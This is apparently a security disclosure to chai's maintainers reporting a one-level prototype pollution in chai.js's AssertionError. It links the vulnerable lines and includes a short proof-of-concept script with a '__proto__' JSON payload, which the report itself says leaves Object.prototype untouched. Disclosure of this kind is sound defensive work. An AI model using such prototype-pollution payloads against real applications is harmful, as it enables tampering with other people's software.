chai
Security vulnerability - Prototype pollution found in npm package - chai
A prototype pollution vulnerability was found in the chai npm package, in the bundled module chai.js. The pollution is limited to one level: properties taken from a caller-supplied parameter are copied onto the object being built, and the global Object.prototype is not affected. Note also that the affected function returns nothing when invoked as in the proof of concept below, so the polluted object is never handed back to the caller.
The vulnerable functionality is exported here: https://github.com/chaijs/chai/blob/529b8b527ba99454471ac67d6aebca9d96cb5dd9/chai.js#L9181. The vulnerable line of code, an object assignment whose property name comes from outside parameters via the "key" variable, is here: https://github.com/chaijs/chai/blob/529b8b527ba99454471ac67d6aebca9d96cb5dd9/chai.js#L9191.
You can find the exploit code below:
const chai = require('chai');
// JSON.parse creates an own property literally named "__proto__"; no setter runs here,
// so obj1's real prototype is still Object.prototype.
const obj1 = JSON.parse('{"__proto__": {"toString": true}}');
console.log(obj1.toString()); // inherited Object.prototype.toString, prints [object Object]
try {
  // Called without `new`, exactly as in the original report.
  const obj2 = chai.AssertionError("Error", obj1, 'ssfi');
  console.log({}.toString()); // One-level pollution only - Object.prototype.toString is still the function
  console.log(obj2.toString()); // AssertionError does not return anything, so obj2 is undefined, but the object inside the function was polluted
}
catch (e) {
  console.log(e.toString());
}
You can prevent this by adding preventive measures such as Object.preventExtensions, which I see is used but commented out in various parts of the code.
Kindly address this issue and feel free to get back if you have any queries. I have raised a GitHub issue for the same.